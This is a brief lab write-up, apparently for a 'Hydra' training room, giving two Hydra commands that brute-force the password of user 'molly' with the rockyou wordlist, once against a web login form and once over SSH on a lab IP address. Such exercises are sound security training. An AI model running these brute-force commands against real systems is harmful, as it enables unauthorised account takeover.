Hydra

March 13, 2024

Task 1: Hydra Introduction

Task 2: Using Hydra

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.194.129 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect."
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.194.129 ssh

Last updated